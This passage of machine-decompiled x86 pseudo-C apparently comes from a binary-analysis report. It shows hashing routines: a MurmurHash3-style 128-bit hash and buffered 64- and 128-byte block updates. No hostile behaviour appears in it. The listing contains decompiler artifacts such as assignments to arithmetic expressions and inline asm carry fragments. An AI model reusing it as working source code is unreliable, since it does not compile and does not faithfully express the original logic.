									__esp[0xb] = __esp[0xb] + __edx;
									__ebp = __ebp - __edx;
									__edx = __esp[2];
									__eax = __ebx + 0x48;
									__ecx = 1;
									 *__esp = __eax;
									__eax = E10025550(__eax, 1, __esp[2]);
									__eax =  *__esp;
									goto L83;
								}
							} else {
								__eax = __ebx + 0x48;
								L83:
								__edx = __esp[0xb];
								__ecx = __ebp;
								__ecx = __ebp >> 6;
								__eax = __ebp;
								__eax = __ebp & 0x0000003f;
								if(__eax != 0) {
									__edi = __esp[0xb];
									__ecx = 8 + __ebx;
									__esi = __esp[0xb] + __ebp;
									if(__eax >= 4) {
										if((__cl & 0x00000001) != 0) {
											__ecx =  *__esi & 0x000000ff;
											__eax = __eax - 1;
											__esi = __esi + 1;
											 *(8 + __ebx) = __cl;
											__ecx = __ebx + 9;
										}
										if((__cl & 0x00000002) != 0) {
											__edi =  *__esi & 0x0000ffff;
											__ecx = __ecx + 2;
											__esi = __esi + 2;
											__eax = __eax - 2;
											 *(__ecx - 2) = __di;
										}
										if(__eax >= 4) {
											__edi = __eax;
											__edx = 0;
											__edi = __eax & 0xfffffffc;
											do {
												__ebx =  *(__esi + __edx);
												 *(__ecx + __edx) =  *(__esi + __edx);
												__edx = __edx + 4;
											} while (__edx < __edi);
											__ecx = __ecx + __edx;
											__esi = __esi + __edx;
										}
									}
									__edx = 0;
									if((__al & 0x00000002) != 0) {
										__edi =  *__esi & 0x0000ffff;
										__edx = 2;
										 *__ecx = __di;
										if((__al & 0x00000001) != 0) {
											goto L88;
										}
									} else {
										if((__al & 0x00000001) != 0) {
											L88:
											__eax =  *(__esi + __edx) & 0x000000ff;
											 *(__ecx + __edx) = __al;
										}
									}
								}
							}
							__ebx = __esp[5];
							__esi = __esp[6];
							__edi = __esp[7];
							__ebp = __esp[8];
							__esp =  &(__esp[9]);
							return __eax;
							goto L440;
						case 0x10:
							__esp[0xa] = __ecx;
							__esp[9] = __edx;
							__eax =  *__ebx;
							__ebx = __esp[6];
							__esp[8] = __eax;
							__esp =  &(__esp[7]);
							_push(__ebp);
							_push(__edi);
							_push(__esi);
							_push(__ebx);
							__esp = __esp - 0x2c;
							__ecx = __esp[0x10];
							__edi = __esp[0x12];
							__ebx = __esp[0x11];
							__eax =  *__ecx;
							__edx =  *(__ecx + 4);
							 *__esp =  *__ecx;
							__eax =  *(8 + __ecx);
							__esp[1] =  *(__ecx + 4);
							__edx =  *(__ecx + 0xc);
							__esp[4] = __eax;
							__esp[5] =  *(__ecx + 0xc);
							if(__esp[0x12] == 0) {
								L176:
								__esp =  &(__esp[0xb]);
								_pop(__ebx);
								_pop(__esi);
								_pop(__edi);
								_pop(__ebp);
								return __eax;
							} else {
								__eax = __esp[0x12];
								__edx = 0;
								 *((intOrPtr*)(__ecx + 0x28)) =  *((intOrPtr*)(__ecx + 0x28)) + __esp[0x12];
								__eax =  *(__ecx + 0x20);
								asm("adc [ecx+0x2c], edx");
								if(__eax <= 0) {
									L171:
									__eax = __esp[0x12];
									__eax = __esp[0x12] & 0xfffffff0;
									__esp[9] = __eax;
									__eax = __eax + __ebx;
									__esp[6] = __eax;
									if(__ebx < __eax) {
										__esi =  *__esp;
										__ebp = __ebx;
										__esp[0x10] = __ecx;
										__edi = __esp[1];
										__esp[0x11] = __ebx;
										do {
											__eax =  *__ebp;
											__ebx = 0x114253d5;
											__ecx =  *(__ebp + 4) * 0x114253d5;
											__edx = __eax * 0x87c37b91;
											__ecx =  *(__ebp + 4) * 0x114253d5 + __eax * 0x87c37b91;
											__edx = __eax * 0x114253d5 >> 0x20;
											__eax = __eax * 0x114253d5;
											__ebx = 0x2745937f;
											__ecx = __edx;
											__eax = (__eax << 0x00000020 | __ecx) << 0x1f;
											__esp[2] = (__eax << 0x00000020 | __ecx) << 0x1f;
											__ecx = (__ecx << 0x00000020 | __eax) << 0x1f;
											__eax =  *(8 + __ebp);
											__esp[3] = __ecx;
											__ecx =  *(__ebp + 0xc) * 0x2745937f;
											__edx = __eax * 0x4cf5ad43;
											__ecx =  *(__ebp + 0xc) * 0x2745937f + __eax * 0x4cf5ad43;
											__edx = __eax * 0x2745937f >> 0x20;
											__eax = __eax * 0x2745937f;
											__edx = __edx + __ecx;
											__ecx = __eax;
											__ecx = (__edx << 0x00000020 | __eax) >> 0x1f;
											__ebx = __edx;
											__edx = __esp[3];
											 *__esp = __ecx;
											__ebx = (__eax << 0x00000020 | __ebx) >> 0x1f;
											__eax = __esp[2] * 0x4cf5ad43;
											__esp[1] = __ebx;
											__ebx = 5;
											__esp[3] * 0x2745937f = __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
											__eax = 0x2745937f;
											__edx = 0x2745937f * __esp[2] >> 0x20;
											__eax = 0x2745937f * __esp[2];
											__edx = (0x2745937f * __esp[2] >> 0x20) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
											__eax = 0x2745937f * __esp[2] ^ __esi;
											__edx = (0x2745937f * __esp[2] >> 0x00000020) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43 ^ __edi;
											__ecx = __eax;
											__eax = (__eax << 0x00000020 | __edx) << 0x1b;
											__edx = (__edx << 0x00000020 | __ecx) << 0x1b;
											__eax = __eax + __esp[4];
											asm("adc edx, [esp+0x14]");
											__ecx = __edx + __edx * 4;
											__edx = __eax * 5 >> 0x20;
											__eax = __eax * 5;
											__edx = __edx + __ecx;
											__esi = __eax;
											__edi = __edx;
											__edx = __esp[1];
											__esi = __eax + 0x52dce729;
											asm("adc edi, 0x0");
											__eax =  *__esp * 0x87c37b91;
											__esp[1] * 0x114253d5 = __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
											__eax = 0x114253d5;
											__edx = 0x114253d5 *  *__esp >> 0x20;
											__eax = 0x114253d5 *  *__esp;
											__edx = (0x114253d5 *  *__esp >> 0x20) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
											__ecx = __esp[4];
											__eax = 0x114253d5 *  *__esp ^ __esp[4];
											__ecx = __esp[5];
											__edx = (0x114253d5 *  *__esp >> 0x00000020) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91 ^ __esp[5];
											__ecx = __eax;
											__eax = (__eax << 0x00000020 | __edx) << 0x1f;
											__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
											__eax = __eax + __esi;
											asm("adc edx, edi");
											__ecx = __edx + __edx * 4;
											__edx = __eax * 5 >> 0x20;
											__eax = __eax * 5;
											__edx = __edx + __ecx;
											__esp[4] = __eax;
											__eax = __esp[6];
											asm("adc edx, 0x0");
											__esp[5] = __edx;
											__ebp = 0x10 + __ebp;
										} while (__ebp < __esp[6]);
										__ebx = __esp[0x11];
										 *__esp = __esi;
										__eax = __esp[9];
										__esp[1] = __edi;
										__ecx = __esp[0x10];
										__ebx = __esp[0x11] + __esp[9];
									}
									__eax =  *__esp;
									__edx = __esp[1];
									 *__ecx =  *__esp;
									__eax = __esp[4];
									 *(__ecx + 4) = __esp[1];
									__edx = __esp[5];
									 *(8 + __ecx) = __esp[4];
									__eax = __esp[0x12];
									 *(__ecx + 0xc) = __esp[5];
									__eax = __esp[0x12] & 0x0000000f;
									if(__eax != 0) {
										__edi = __eax;
										__esi = 0x10 + __ecx;
										if(__eax >= 4) {
											if((__esi & 0x00000001) != 0) {
												__edx =  *__ebx & 0x000000ff;
												__esi = __ecx + 0x11;
												__ebx = __ebx + 1;
												__edi = __eax - 1;
												 *(0x10 + __ecx) = __dl;
											}
											if((__esi & 0x00000002) != 0) {
												__edx =  *__ebx & 0x0000ffff;
												__esi = __esi + 2;
												__ebx = __ebx + 2;
												__edi = __edi - 2;
												 *(__esi - 2) = __dx;
											}
											if(__edi >= 4) {
												 *__esp = __eax;
												__ebp = __edi;
												__edx = 0;
												__ebp = __edi & 0xfffffffc;
												do {
													__eax =  *(__ebx + __edx);
													 *(__esi + __edx) =  *(__ebx + __edx);
													__edx = __edx + 4;
												} while (__edx < __ebp);
												__eax =  *__esp;
												__esi = __esi + __edx;
												__ebx = __ebx + __edx;
											}
										}
										__edx = 0;
										if((__edi & 0x00000002) != 0) {
											__edx =  *__ebx & 0x0000ffff;
											 *__esi = __dx;
											__edx = 2;
										}
										if(__edi != 0) {
											__ebx =  *(__ebx + __edx) & 0x000000ff;
											 *(__esi + __edx) = __bl;
										}
										 *(__ecx + 0x20) = __eax;
										__esp =  &(__esp[0xb]);
										_pop(__ebx);
										_pop(__esi);
										_pop(__edi);
										_pop(__ebp);
										return __eax;
									} else {
										goto L176;
									}
								} else {
									if(__eax > 0xf) {
										L170:
										__eax =  *(0x10 + __ecx);
										__esi = 0x114253d5;
										__ebp =  *(__ecx + 0x14) * 0x114253d5;
										 *(__ecx + 0x20) = 0;
										__edx = __eax * 0x87c37b91;
										__edi =  *(__ecx + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
										__edx = __eax * 0x114253d5 >> 0x20;
										__eax = __eax * 0x114253d5;
										__esi =  *(__ecx + 0x1c) * 0x2745937f;
										__edx = __edi + __edx;
										__eax = (__eax << 0x00000020 | __edx) << 0x1f;
										__ebp = __edx;
										__esp[6] = (__eax << 0x00000020 | __edx) << 0x1f;
										__ebp = (__edx << 0x00000020 | __eax) << 0x1f;
										__eax =  *(__ecx + 0x18);
										__esp[7] = __ebp;
										__edx = __eax * 0x4cf5ad43;
										__esi =  *(__ecx + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
										__edx = 0x2745937f;
										__edx = __eax * 0x2745937f >> 0x20;
										__eax = __eax * 0x2745937f;
										__edx = __esi + __edx;
										__eax = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
										__edi = __edx;
										__esp[2] = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
										__edi = (__eax << 0x00000020 | __edx) >> 0x1f;
										__esi = __esp[6];
										__esp[3] = (__eax << 0x00000020 | __edx) >> 0x1f;
										__edi = __esp[7];
										__eax = __esi * 0x4cf5ad43;
										__edx = __esp[7] * 0x2745937f;
										__edi = __esp[1];
										__ebp = __esp[7] * 0x2745937f + __esi * 0x4cf5ad43;
										__eax = 0x2745937f;
										__edx = 0x2745937f * __esi >> 0x20;
										__eax = 0x2745937f * __esi;
										__esi =  *__esp;
										__edx = __edx + __ebp;
										__eax = __eax ^  *__esp;
										__edx = __edx ^ __esp[1];
										__esi = __eax;
										__edi = __esp[2];
										__eax = (__eax << 0x00000020 | __edx) << 0x1b;
										__ebp = 5;
										__edx = (__edx << 0x00000020 | __esi) << 0x1b;
										__eax = __eax + __esp[4];
										asm("adc edx, [esp+0x14]");
										__esi = __edx + __edx * 4;
										__edx = __eax * 5 >> 0x20;
										__eax = __eax * 5;
										__ebp = __esp[3];
										__edx = __esi + __edx;
										 *__esp = __eax;
										asm("adc edx, 0x0");
										__esp[1] = __edx;
										__eax = __edi * 0x87c37b91;
										__edx = __esp[3] * 0x114253d5;
										__ebp = __esp[4];
										__esi = __esp[3] * 0x114253d5 + __edi * 0x87c37b91;
										__eax = __edi;
										__edi = 0x114253d5;
										__edx = __eax * 0x114253d5 >> 0x20;
										__eax = __eax * 0x114253d5;
										__edi = 5;
										__edx = __esi + __edx;
										__esi = __esp[5];
										__eax = __eax ^ __esp[4];
										__ebp = __eax;
										__edx = __edx ^ __esp[5];
										__eax = (__eax << 0x00000020 | __edx) << 0x1f;
										__edx = (__edx << 0x00000020 | __ebp) << 0x1f;
										__eax = __eax +  *__esp;
										asm("adc edx, [esp+0x4]");
										__ebp = __edx + __edx * 4;
										__edx = __eax * 5 >> 0x20;
										__eax = __eax * 5;
										__edx = __edx + __ebp;
										__esp[4] = __eax;
										asm("adc edx, 0x0");
										__esp[5] = __edx;
										goto L171;
									} else {
										__edi = __eax + 1;
										__ebp = __esp[0x12];
										 *(__ecx + 0x20) = __edi;
										__edx =  *__ebx & 0x000000ff;
										__ebp = __esp[0x12] - 1;
										 *(__ecx + __eax + 0x10) = __dl;
										if(__ebp == 0) {
											goto L176;
										} else {
											if(__edi == 0x10) {
												__esp[0x12] = __ebp;
												__ebx = __ebx + 1;
												goto L170;
											} else {
												__ebp = __eax + 2;
												 *(__ecx + 0x20) = __ebp;
												__edx =  *(__ebx + 1) & 0x000000ff;
												 *(__ecx + __edi + 0x10) = __dl;
												__edx = __esp[0x12];
												__edx = __esp[0x12] - 2;
												if(__edx == 0) {
													goto L176;
												} else {
													if(__ebp == 0x10) {
														__esp[0x12] = __edx;
														__ebx = __ebx + 2;
														goto L170;
													} else {
														__edi = __eax + 3;
														 *(__ecx + 0x20) = __edi;
														__edx =  *(__ebx + 2) & 0x000000ff;
														 *(__ecx + 0x10 + __ebp) = __dl;
														__ebp = __esp[0x12];
														__ebp = __esp[0x12] - 3;
														if(__ebp == 0) {
															goto L176;
														} else {
															if(__edi == 0x10) {
																__esp[0x12] = __ebp;
																__ebx = __ebx + 3;
																goto L170;
															} else {
																__ebp = __eax + 4;
																 *(__ecx + 0x20) = __ebp;
																__edx =  *(__ebx + 3) & 0x000000ff;
																 *(__ecx + __edi + 0x10) = __dl;
																__edx = __esp[0x12];
																__edx = __esp[0x12] - 4;
																if(__edx == 0) {
																	goto L176;
																} else {
																	if(__ebp == 0x10) {
																		__esp[0x12] = __edx;
																		__ebx = __ebx + 4;
																		goto L170;
																	} else {
																		__edi = __eax + 5;
																		 *(__ecx + 0x20) = __edi;
																		__edx =  *(__ebx + 4) & 0x000000ff;
																		 *(__ecx + 0x10 + __ebp) = __dl;
																		__ebp = __esp[0x12];
																		__ebp = __esp[0x12] - 5;
																		if(__ebp == 0) {
																			goto L176;
																		} else {
																			if(__edi == 0x10) {
																				__esp[0x12] = __ebp;
																				__ebx = 5 + __ebx;
																				goto L170;
																			} else {
																				__ebp = __eax + 6;
																				 *(__ecx + 0x20) = __ebp;
																				__edx =  *(5 + __ebx) & 0x000000ff;
																				 *(__ecx + __edi + 0x10) = __dl;
																				__edx = __esp[0x12];
																				__edx = __esp[0x12] - 6;
																				if(__edx == 0) {
																					goto L176;
																				} else {
																					if(__ebp == 0x10) {
																						__esp[0x12] = __edx;
																						__ebx = __ebx + 6;
																						goto L170;
																					} else {
																						__edi = __eax + 7;
																						 *(__ecx + 0x20) = __edi;
																						__edx =  *(__ebx + 6) & 0x000000ff;
																						 *(__ecx + 0x10 + __ebp) = __dl;
																						__ebp = __esp[0x12];
																						__ebp = __esp[0x12] - 7;
																						if(__ebp == 0) {
																							goto L176;
																						} else {
																							if(__edi == 0x10) {
																								__esp[0x12] = __ebp;
																								__ebx = __ebx + 7;
																								goto L170;
																							} else {
																								__ebp = __eax + 8;
																								 *(__ecx + 0x20) = __ebp;
																								__edx =  *(__ebx + 7) & 0x000000ff;
																								 *(__ecx + __edi + 0x10) = __dl;
																								__edx = __esp[0x12];
																								__edx = __esp[0x12] - 8;
																								if(__edx == 0) {
																									goto L176;
																								} else {
																									if(__ebp == 0x10) {
																										__esp[0x12] = __edx;
																										__ebx = 8 + __ebx;
																										goto L170;
																									} else {
																										__edi = __eax + 9;
																										 *(__ecx + 0x20) = __edi;
																										__edx =  *(8 + __ebx) & 0x000000ff;
																										 *(__ecx + 0x10 + __ebp) = __dl;
																										__ebp = __esp[0x12];
																										__ebp = __esp[0x12] - 9;
																										if(__ebp == 0) {
																											goto L176;
																										} else {
																											if(__edi == 0x10) {
																												__esp[0x12] = __ebp;
																												__ebx = __ebx + 9;
																												goto L170;
																											} else {
																												__ebp = __eax + 0xa;
																												 *(__ecx + 0x20) = __ebp;
																												__edx =  *(__ebx + 9) & 0x000000ff;
																												 *(__ecx + __edi + 0x10) = __dl;
																												__edx = __esp[0x12];
																												__edx = __esp[0x12] - 0xa;
																												if(__edx == 0) {
																													goto L176;
																												} else {
																													if(__ebp == 0x10) {
																														__esp[0x12] = __edx;
																														__ebx = __ebx + 0xa;
																														goto L170;
																													} else {
																														__edi = __eax + 0xb;
																														 *(__ecx + 0x20) = __edi;
																														__edx =  *(__ebx + 0xa) & 0x000000ff;
																														 *(__ecx + 0x10 + __ebp) = __dl;
																														__ebp = __esp[0x12];
																														__ebp = __esp[0x12] - 0xb;
																														if(__ebp == 0) {
																															goto L176;
																														} else {
																															if(__edi == 0x10) {
																																__esp[0x12] = __ebp;
																																__ebx = __ebx + 0xb;
																																goto L170;
																															} else {
																																__ebp = __eax + 0xc;
																																 *(__ecx + 0x20) = __ebp;
																																__edx =  *(__ebx + 0xb) & 0x000000ff;
																																 *(__ecx + __edi + 0x10) = __dl;
																																__edx = __esp[0x12];
																																__edx = __esp[0x12] - 0xc;
																																if(__edx == 0) {
																																	goto L176;
																																} else {
																																	if(__ebp == 0x10) {
																																		__esp[0x12] = __edx;
																																		__ebx = __ebx + 0xc;
																																		goto L170;
																																	} else {
																																		__edi = __eax + 0xd;
																																		 *(__ecx + 0x20) = __edi;
																																		__edx =  *(__ebx + 0xc) & 0x000000ff;
																																		 *(__ecx + 0x10 + __ebp) = __dl;
																																		__ebp = __esp[0x12];
																																		__ebp = __esp[0x12] - 0xd;
																																		if(__ebp == 0) {
																																			goto L176;
																																		} else {
																																			if(__edi == 0x10) {
																																				__esp[0x12] = __ebp;
																																				__ebx = __ebx + 0xd;
																																				goto L170;
																																			} else {
																																				__eax = __eax + 0xe;
																																				 *(__ecx + 0x20) = __eax;
																																				__edx =  *(__ebx + 0xd) & 0x000000ff;
																																				 *(__ecx + __edi + 0x10) = __dl;
																																				__edx = __esp[0x12];
																																				__edx = __esp[0x12] - 0xe;
																																				if(__edx == 0) {
																																					goto L176;
																																				} else {
																																					if(__eax != 0xf) {
																																						__esp[0x12] = __edx;
																																						__ebx = __ebx + 0xe;
																																						goto L170;
																																					} else {
																																						 *(__ecx + 0x20) = 0x10;
																																						__edx = __ebx + 0xf;
																																						__eax =  *(__ebx + 0xe) & 0x000000ff;
																																						_t390 =  &(__esp[0x12]);
																																						 *_t390 = __esp[0x12] - 0xf;
																																						 *(__ecx + 0x1f) = __al;
																																						if( *_t390 == 0) {
																																							goto L176;
																																						} else {
																																							__ebx = __edx;
																																							goto L170;
																																						}
																																					}
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							goto L440;
						case 0x11:
							__esp[0xa] = __ecx;
							__esp[9] = __edx;
							__eax =  *__ebx;
							__ebx = __esp[6];
							__esp[8] = __eax;
							__esp =  &(__esp[7]);
							_push(__ebp);
							__edx = 0;
							_push(__edi);
							_push(__esi);
							_push(__ebx);
							__esp = __esp - 0x2c;
							__esi = __esp[0x10];
							__ebx = __esp[0x12];
							__edi =  *(__esi + 8);
							__eax = __ebx;
							__edi =  *(__esi + 8) & 0x0000003f;
							__eax = __ebx +  *(__esi + 8);
							asm("adc edx, [esi+0xc]");
							 *(__esi + 8) = __ebx +  *(__esi + 8);
							__eax = 0x40;
							__eax = 0x40 - __edi;
							 *(__esi + 0xc) = 0;
							__edx = __edi + 0x10;
							if(__ebx >= 0x40) {
								__ecx = __esp[0x11];
								__ebp = __esi + __edx;
								__esp[5] = 0x40;
								if(0x40 >= 4) {
									if((__ebp & 0x00000001) != 0) {
										__ecx =  *__ecx & 0x000000ff;
										__edx = 0x3f;
										__ebp = __ebp + 1;
										 *(__ebp - 1) = __cl;
										__esp[5] = 0x3f;
										__ecx = __esp[0x11];
										__ecx = __esp[0x11] + 1;
									}
									if((__ebp & 0x00000002) != 0) {
										__edx =  *__ecx & 0x0000ffff;
										__ebp = __ebp + 2;
										__ecx = __ecx + 2;
										 *(__ebp - 2) = __dx;
										__esp[5] = __esp[5] - 2;
									}
									__edx = __esp[5];
									if(__edx >= 4) {
										__esp[7] = __eax;
										__esp[6] = __edx;
										__edx = 0;
										__esp[0x12] = __ebx;
										__eax = __esp[6];
										do {
											__ebx =  *(__ecx + __edx);
											 *(__ebp + __edx) =  *(__ecx + __edx);
											__edx = __edx + 4;
										} while (__edx < __eax);
										__eax = __esp[7];
										__ebp = __ebp + __edx;
										__ecx = __ecx + __edx;
										__ebx = __esp[0x12];
									}
								}
								__edx = 0;
								if((__esp[5] & 0x00000002) != 0) {
									__edx =  *__ecx & 0x0000ffff;
									 *__ebp = __dx;
									__edx = 2;
									if((__esp[5] & 0x00000001) != 0) {
										goto L241;
									}
								} else {
									if((__esp[5] & 0x00000001) != 0) {
										L241:
										__ecx =  *(__ecx + __edx) & 0x000000ff;
										 *(__ebp + __edx) = __cl;
									}
								}
								__esp[5] = __eax;
								__edx = __esi + 0x10;
								__esp[1] = __esi + 0x10;
								__ebp = __esi + 0x50;
								 *__esp = __ebp;
								__ebx = __edi + __ebx - 0x40;
								 *((intOrPtr*)(__esi + 0x78))() = __esp[5];
								__edx = __ebx;
								__esp[0x11] = __esp[0x11] + __esp[5];
								__edx = __ebx & 0xffffffc0;
								__ebx = __ebx & 0x0000003f;
								__eax = __esp[0x11];
								__eax = __esp[0x11] + __edx;
								if(__esp[0x11] >= __eax) {
									__edx = 0x10;
								} else {
									__esp[0x12] = __ebx;
									__edi = __esp[0x11];
									__esp[5] = __edx;
									__ebx = __esp[0x11];
									__edi = __eax;
									do {
										__esp[1] = __ebx;
										__ebx = 0x40 + __ebx;
										 *__esp = __ebp;
										__eax =  *((intOrPtr*)(__esi + 0x78))();
									} while (__ebx < __edi);
									__edx = __esp[5];
									__esp[0x11] = __esp[0x11] + __esp[5];
									__edx = 0x10;
									__ebx = __esp[0x12];
								}
							}
							__eax = __esp[0x11];
							__ecx = __esi + __edx;
							if(__ebx >= 4) {
								if((__cl & 0x00000001) != 0) {
									__edx =  *__eax & 0x000000ff;
									__ecx = __ecx + 1;
									__eax = __eax + 1;
									__ebx = __ebx - 1;
									 *(__ecx - 1) = __dl;
								}
								if((__cl & 0x00000002) != 0) {
									__edi =  *__eax & 0x0000ffff;
									__ecx = __ecx + 2;
									__eax = __eax + 2;
									__ebx = __ebx - 2;
									 *(__ecx - 2) = __di;
								}
								if(__ebx >= 4) {
									__edi = __ebx;
									__edx = 0;
									__edi = __ebx & 0xfffffffc;
									do {
										__esi =  *(__eax + __edx);
										 *(__ecx + __edx) =  *(__eax + __edx);
										__edx = __edx + 4;
									} while (__edx < __edi);
									__ecx = __ecx + __edx;
									__eax = __eax + __edx;
								}
							}
							__edx = 0;
							if((__bl & 0x00000002) != 0) {
								__esi =  *__eax & 0x0000ffff;
								__edx = 2;
								 *__ecx = __si;
								if((__bl & 0x00000001) == 0) {
									goto L224;
								} else {
									goto L225;
								}
							} else {
								if((__bl & 0x00000001) != 0) {
									L225:
									__eax =  *(__eax + __edx) & 0x000000ff;
									 *(__ecx + __edx) = __al;
									__esp =  &(__esp[0xb]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
								} else {
									L224:
									__esp =  &(__esp[0xb]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
								}
							}
							goto L440;
						case 0x12:
							__esp[0xa] = __ecx;
							__esp[9] = __edx;
							__eax =  *__ebx;
							__ebx = __esp[6];
							__esp[8] = __eax;
							__esp =  &(__esp[7]);
							_push(__ebp);
							__edx = 0;
							_push(__edi);
							_push(__esi);
							_push(__ebx);
							__esp = __esp - 0x2c;
							__esi = __esp[0x10];
							__ebx = __esp[0x12];
							__edi =  *(__esi + 8);
							__eax = __ebx;
							__edi =  *(__esi + 8) & 0x0000003f;
							__eax = __ebx +  *(__esi + 8);
							asm("adc edx, [esi+0xc]");
							 *(__esi + 8) = __ebx +  *(__esi + 8);
							__eax = 0x40;
							__eax = 0x40 - __edi;
							 *(__esi + 0xc) = 0;
							__edx = __edi + 0x10;
							if(__ebx >= 0x40) {
								__ecx = __esp[0x11];
								__ebp = __esi + __edx;
								__esp[5] = 0x40;
								if(0x40 >= 4) {
									if((__ebp & 0x00000001) != 0) {
										__ecx =  *__ecx & 0x000000ff;
										_t914 = __eax - 1; // 0x3f
										__edx = _t914;
										__ebp = __ebp + 1;
										 *(__ebp - 1) = __cl;
										__esp[5] = _t914;
										__ecx = __esp[0x11];
										__ecx = __esp[0x11] + 1;
									}
									if((__ebp & 0x00000002) != 0) {
										__edx =  *__ecx & 0x0000ffff;
										__ebp = __ebp + 2;
										__ecx = __ecx + 2;
										 *(__ebp - 2) = __dx;
										__esp[5] = __esp[5] - 2;
									}
									__edx = __esp[5];
									if(__edx >= 4) {
										__esp[7] = __eax;
										__esp[6] = __edx;
										__edx = 0;
										__esp[0x12] = __ebx;
										__eax = __esp[6];
										do {
											__ebx =  *(__ecx + __edx);
											 *(__ebp + __edx) =  *(__ecx + __edx);
											__edx = __edx + 4;
										} while (__edx < __eax);
										__eax = __esp[7];
										__ebp = __ebp + __edx;
										__ecx = __ecx + __edx;
										__ebx = __esp[0x12];
									}
								}
								__edx = 0;
								if((__esp[5] & 0x00000002) != 0) {
									__edx =  *__ecx & 0x0000ffff;
									 *__ebp = __dx;
									__edx = 2;
									if((__esp[5] & 0x00000001) != 0) {
										goto L294;
									}
								} else {
									if((__esp[5] & 0x00000001) != 0) {
										L294:
										__ecx =  *(__ecx + __edx) & 0x000000ff;
										 *(__ebp + __edx) = __cl;
									}
								}
								__esp[5] = __eax;
								__edx = __esi + 0x10;
								__esp[1] = __esi + 0x10;
								__ebp = __esi + 0x50;
								 *__esp = __ebp;
								__ebx = __edi + __ebx - 0x40;
								 *(__esi + 0x70)() = __esp[5];
								__edx = __ebx;
								__esp[0x11] = __esp[0x11] + __esp[5];
								__edx = __ebx & 0xffffffc0;
								__ebx = __ebx & 0x0000003f;
								__eax = __esp[0x11];
								__eax = __esp[0x11] + __edx;
								if(__esp[0x11] >= __eax) {
									__edx = 0x10;
								} else {
									__esp[0x12] = __ebx;
									__edi = __esp[0x11];
									__esp[5] = __edx;
									__ebx = __esp[0x11];
									__edi = __eax;
									do {
										__esp[1] = __ebx;
										__ebx = 0x40 + __ebx;
										 *__esp = __ebp;
										__eax =  *(__esi + 0x70)();
									} while (__ebx < __edi);
									__edx = __esp[5];
									__esp[0x11] = __esp[0x11] + __esp[5];
									__edx = 0x10;
									__ebx = __esp[0x12];
								}
							}
							__eax = __esp[0x11];
							__ecx = __esi + __edx;
							if(__ebx >= 4) {
								if((__cl & 0x00000001) != 0) {
									__edx =  *__eax & 0x000000ff;
									__ecx = __ecx + 1;
									__eax = __eax + 1;
									__ebx = __ebx - 1;
									 *(__ecx - 1) = __dl;
								}
								if((__cl & 0x00000002) != 0) {
									__edi =  *__eax & 0x0000ffff;
									__ecx = __ecx + 2;
									__eax = __eax + 2;
									__ebx = __ebx - 2;
									 *(__ecx - 2) = __di;
								}
								if(__ebx >= 4) {
									__edi = __ebx;
									__edx = 0;
									__edi = __ebx & 0xfffffffc;
									do {
										__esi =  *(__eax + __edx);
										 *(__ecx + __edx) =  *(__eax + __edx);
										__edx = __edx + 4;
									} while (__edx < __edi);
									__ecx = __ecx + __edx;
									__eax = __eax + __edx;
								}
							}
							__edx = 0;
							if((__bl & 0x00000002) != 0) {
								__esi =  *__eax & 0x0000ffff;
								__edx = 2;
								 *__ecx = __si;
								if((__bl & 0x00000001) == 0) {
									goto L277;
								} else {
									goto L278;
								}
							} else {
								if((__bl & 0x00000001) != 0) {
									L278:
									__eax =  *(__eax + __edx) & 0x000000ff;
									 *(__ecx + __edx) = __al;
									__esp =  &(__esp[0xb]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
								} else {
									L277:
									__esp =  &(__esp[0xb]);
									_pop(__ebx);
									_pop(__esi);
									_pop(__edi);
									_pop(__ebp);
									return __eax;
								}
							}
							goto L440;
						case 0x13:
							__esp[0xa] = __ecx;
							__esp[9] = __edx;
							__eax =  *__ebx;
							__ebx = __esp[6];
							__esp[8] = __eax;
							__esp =  &(__esp[7]);
							_push(__ebp);
							__edx = 0;
							_push(__edi);
							_push(__esi);
							__esi = 0x80;
							_push(__ebx);
							__esp = __esp - 0x14;
							__edi = __esp[0xa];
							__ebx = __esp[0xc];
							__ecx =  *(__edi + 8);
							__eax = __ebx;
							__ecx =  *(__edi + 8) & 0x0000007f;
							__eax = __ebx +  *(__edi + 8);
							asm("adc edx, [edi+0xc]");
							__esi = 0x80 - __ecx;
							 *(__edi + 8) = __ebx +  *(__edi + 8);
							__eax = 0x10 + __ecx;
							 *(__edi + 0xc) = 0;
							if(__ebx >= 0x80) {
								__edx = __esp[0xb];
								__ebp = __edi + __eax;
								 *__esp = 0x80;
								if(0x80 >= 4) {
									if((__ebp & 0x00000001) != 0) {
										__eax =  *__edx & 0x000000ff;
										__ebp = __ebp + 1;
										 *(__ebp - 1) = __al;
										__eax = __esp[0xb];
										__edx = __esp[0xb] + 1;
										_t1027 = __esi - 1; // 0x7f
										__eax = _t1027;
										 *__esp = _t1027;
									}
									if((__ebp & 0x00000002) != 0) {
										__eax =  *__edx & 0x0000ffff;
										__ebp = __ebp + 2;
										__edx = __edx + 2;
										 *(__ebp - 2) = __ax;
										 *__esp =  *__esp - 2;
									}
									__eax =  *__esp;
									if(__eax >= 4) {
										__esp[2] = __esi;
										__esp[1] = __eax;
										__eax = 0;
										__esp[3] = __ecx;
										__esi = __esp[1];
										do {
											__ecx =  *(__eax + __edx);
											 *(__eax + __ebp) =  *(__eax + __edx);
											__eax = __eax + 4;
										} while (__eax < __esi);
										__esi = __esp[2];
										__ebp = __eax + __ebp;
										__edx = __eax + __edx;
										__ecx = __esp[3];
									}
								}
								__eax = 0;
								if(( *__esp & 0x00000002) != 0) {
									__eax =  *__edx & 0x0000ffff;
									 *__ebp = __ax;
									__eax = 2;
									if(( *__esp & 0x00000001) != 0) {
